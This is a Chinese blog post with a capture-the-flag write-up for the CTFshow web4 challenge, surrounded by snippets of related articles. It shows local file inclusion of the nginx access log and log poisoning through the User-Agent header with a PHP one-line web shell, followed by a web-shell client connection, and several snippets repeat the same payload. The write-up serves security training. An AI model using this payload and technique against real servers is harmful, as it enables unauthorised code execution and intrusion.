CTFshow web4 详解

最新推荐文章于 2024-05-15 02:43:13 发布
最新推荐文章于 2024-05-15 02:43:13 发布
阅读量2.3k 收藏 9
点赞数 5
分类专栏: CTFshow 文章标签: 服务器 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lzu_lfl/article/details/127339595
版权

进入题目,看到只有一句文件包含的提示。

 文件包含我们尝试了input协议和data协议,但是都不可行,应该都被禁用了。所以我们再看看它的数据包吧。

我们发现该道题使用的是nginx服务器,那我们想到可不可以通过日志文件进行写码来得到flag呢,所以我们访问日志看看

?url=/var/log/nginx/access.log

 查看日志发现,每访问一次数据包中的UA头会被写进日志中,那就尝试在UA头中写码

<?php eval($_POST['cmd']); ?>

 在UA头后插入一句话木马后日志文件里并未显示说明木马已经被解析了,然后使用蚁剑连接。

 连接后,flag就在网页根目录中

 

 

Fox_light
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
CTFshow web入门 web4
weixin_45990644的博客
07-07 703
CTFshow web入门 web4 题目提示robots,看了些文章反应过来时是关于robots的协议问题,利用“robots.txt”来进行查看链接: 打开之后发现这些代码,百度了一下是些Roberts协议。 User-agent: * 表示所有的搜索引擎种类,*是一个通配符。 Disallow: /flagishere.txt表示是禁止爬取名为flagishere的txt文件。 本着实验的心态在链接后面加了/flagishere.txt试了试,最后得到了flag 。 补充 因为之前没有接触过爬虫,
ctfshow-web4(文件包含&日志注入)
Welcome To Myon'Blog !
10-08 1183
Nginx中的日志分两种,一种是error.log,一种是access.log。中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。对于Ngnix,日志存放路径:/var/log/nginx/access.log 和 /var/log/nginx/error.log。进入后台,找到flag。
基于CTFshow的web4下的文件包含学习
Cyber Striver的博客
09-26 1378
基于CTFshow的web4下的文件包含学习。还涉及ctfhub的文件包含题解。
网络安全最新ctfshow-萌新-web4( 利用逻辑运算符绕过获取网站敏感信息)_ctf,2024年最新网络安全studio基础
最新发布
2401_84263282的博客
05-15 393
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
CTFshow-web-web4
qq_68581192的博客
10-08 140
点击放包,发现日志文件的内容多了一条访问记录,但是没有我们插入的一句话木马(因为日志文件中的代码会被执行,但是不会显示)php eval($_POST['txy'])?> // ['']单引号里面是连接的密码。可以使用代理工具Burp Suite抓包,在User-Agent中插入一句话木马。包含日志文件,查看日志文件的信息,可以看到日志文件中保存了网站的访问记录。找到www目录下有一个flag.txt文件。进入此文件,找到flag。
ctfshow-萌新-web4( 利用逻辑运算符绕过获取网站敏感信息)_ctf(1)
2401_84264244的博客
05-02 25
intval()函数在转换整数时,如果被转换的是字符串,则会从最左边第一个字符开始转换,直到遇到非整数的字符才会停止转换我们构造的参数,被后端通过get请求获取后,拿到的是一个字符串 ‘2 || id = 1000’这个字符串被intval() 函数转换后的结果是 2 (因为字符 | 是非整数的字符,所以会停止转换), 2 > 999 if 判断返回false, 从而进入else中执行SQL语句我们构造的参数拼接到SQL中,会变成下面这个样子id=1 时的查询结果id=2时的查询结果。
移动开发Web框架详解
07-23
教程名称:移动开发Web框架详解课程目录:【】Android Framework框架分析【】jquery mobile 参考手册【】jquery Mobile【】jQuery Mobile中文手册【】phonegap【】手机HTML5框架 Sencha Touch 1.1.0【】跨平台移动...
Web服务器之Nginx详解
07-23
资源名称:Web服务器之Nginx详解内容简介: Nginx有两个基本功能,一个是作为Web服务器(在这篇博文中重点讲解),另一个是作为反向代理(在下面的博文中详细讲解)。下面我们就来演示具体配置。首先我们要做的就是配置...
web.xml配置详解.docx
11-29
web.xml 配置详解 Web.xml 是一个用于配置 Java Web 应用程序的 XML 文件,它提供了站台的配置设定。web.xml 文件位于每个站点的 WEB-INF 目录下,用于定义站台的名称、环境参数、Servlet 的名称和映射、Session 的...
web.xml 配置详解
09-28
web.xml 配置详解,需要的下载了。。。Web.xml常用元素和在java web规范中说明.按照listner,filter,servlet的顺序初始化
Web程序工作原理详解
10-25
主要介绍了Web程序工作原理的相关知识,非常的全面,需要的朋友可以参考下
ctf.show_web4
rev1ve的博客
03-19 114
ctf.show_web4 文件包含 日志注入
ctfshow-WEB入门-Part4-wp
F1rstb100d
10-06 1909
ctfshow-WEB入门-Part4-wp
ctfshow pwn4
qq_39980610的博客
08-22 640
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。当程序停止在比对canary的时候我们可以看到栈上的0xc有了一个数据其实就是canary。我们可以分别将断点下在printf函数和程序比对canary的地址。
BugkuCTF_Web——“web4”、“输入密码查看flag”
Ho1aAs‘s Blog
09-10 463
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
ctfshow web4
weixin_51866363的博客
11-22 4113
本次解法准备工具:burpsuite ,中国蚁剑 这是web3的进化版,老的方法已经行不通了,只能通过日志注入得到shell 这里我们输入默认目录获取日志 ?url=/var/log/nginx/access.log
CTFSHOW WEB_AK赛
羽的博客
07-31 3025
签到_观己 既然是签到,那我们就去猜一下flag的位置以及文件名 payload:file=/flag.txt 结束 如果猜不到呢,我们只能另寻他法了 1、尝试用伪协议中的data(具体伪协议的用法可参考https://blog.csdn.net/nzjdsds/article/details/82461043)发现allow_url_include没有开启。 2、让file=/var/log/nginx/access.log发现可以读取nginx的日志内容,那我们可以试试日志包含写一句话。(其中日志中有客
CtfShow web-web4 WP
qq_45427131的博客
05-11 237
进入WEB4 发现好像和 web3差不多,尝试文件包含可行,但是用php://input 回显就不可行了,接下来尝试包含日志 用burp suite抓包发送到repeater ,在url后面加上 /var/log/nginx/access.log(nginx访问日志) 可以看到回显的内容中有http user-agent,接下来将一句话木马写入到user-agent中, 在user-agent后面加上一句话木马,密码是a <?php @eval($_POST[‘a’]);?> 接.
ctfshow web23
07-29
- *3* [ctfshow web入门 web23详解](https://blog.csdn.net/m0_73860001/article/details/131622788)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值